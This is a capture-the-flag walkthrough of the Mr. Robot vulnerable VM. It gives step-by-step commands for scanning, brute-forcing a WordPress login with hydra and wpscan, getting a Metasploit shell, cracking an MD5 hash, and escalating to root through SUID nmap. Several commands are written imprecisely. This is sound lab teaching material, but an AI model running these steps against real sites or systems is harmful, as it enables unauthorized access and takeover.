Mr. Robot CTF Hacking Complete Walkthrough

Mr. Robot CTF Walkthrough

Information Gathering

netdiscover -i wlan0 – To get the server address

nmap -O 192.168.1.108 – To scan the target and get info regarding the OS and services

Vulnerability Assessment

Use web vulnerability scanners like Wpscan or Nikto to discover vulnerabilities.

wpscan –url 192.168.1.108
nikto -h 192.168.1.108

Capturing the first flag

Access the robots.txt file
Use the wget utility or burp suite to get the files and open the first key.

wget <IP> /fsocity.dic/key-1-of-3.txt

Optimizing the dictionary file

The dictionary file has many duplicates and needs to be optimized and sorted for maximum efficiency.
This will come in handy when we are performing a brute force/dictionary attack; as the attempts will be carried out in an ordered and as efficient as possible. Minimizing the cracking time and reducing the size of the dictionary file.

cat fsocity.dic| sort -u | uniq > Newfsocity.dic

Use wpscan and find the login page, we need the username and password, but luckily we have the dictionary file.

We need to intercept the requests being send and modify them to get the username.
we can do this using burp or zap, I am going to use burp.

We can stop the intercept, use the proxy and then turn on intercept and enter credentials and hit log in.
We can then intercept the post request and identify the fields we need to brute force.

We now need to use an online cracking tool, we can use hydra as it is the most powerful.

We are going to use the log and pwd fields.

The objective is to find the username first, we can then bruteforce the password after.

hydra -V -L fsocity.dic-p test 192.168.1.108 http-post-form ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’

This should work for most forms.

We are looking for the http post form, that shows us that a username exists

We can now use wpscan to crack the password, because it is faster for wordpress cracking

wpscan –url 192.168.1.108 –wordlist home/alexis/Desktop/fsocity.dic –username elliot

Exploitation

We can now log in and I am the admin so I can install plug ins like a file manager, I now need to maintain access and escalate my privileges , I can do this by using weevely for a backdoor and a reverse shell, or we can be smart and use metasploit which will do all the hard work for us and we can use meterpreter for a reverse connection

msfconsole

search wp_admin_shell

use and set options – username password rhost exploit

It is going to give us a meterpreter with a shell but with no tty (terminal)

We can then start a tty shell – terminal shell

– shell

Many people over complicate it by importing it with python.

/bin/sh -i
or
python -c ‘import pty; pty.spawn(“/bin/sh”)’

We can check who we are logged in as.

id

cd /home/robot

key-2-of-3.txt
key-2 and password.raw-md5

cat password.raw-md5

It is an md5 hashed password that we can crack with hashcat or because I am lazy crackstation.net.

login as robot and we now have the password so we can log in.

We can then view the 2nd key –

cat home/robot/key2.

Privilege Escalation

Ok we now need to get root access also known as privilege escalation
The only way in is by finding a file that has the super user ID bits (SUID)

We can use the find command

find / -perm -4000 2>/dev/null

It looks like we can use Nmap in root

Let’s see if we can run it in interactive mode which will allow us to use additional commands to get the root

Nmap –interactive

sh! – to get in to root

id – and we are root!

Let’s go to the root folder and we get the last key.

Done.

Liked it? Take a second to support Alexis on Patreon!
Share this post

Leave a Reply

Your email address will not be published. Required fields are marked *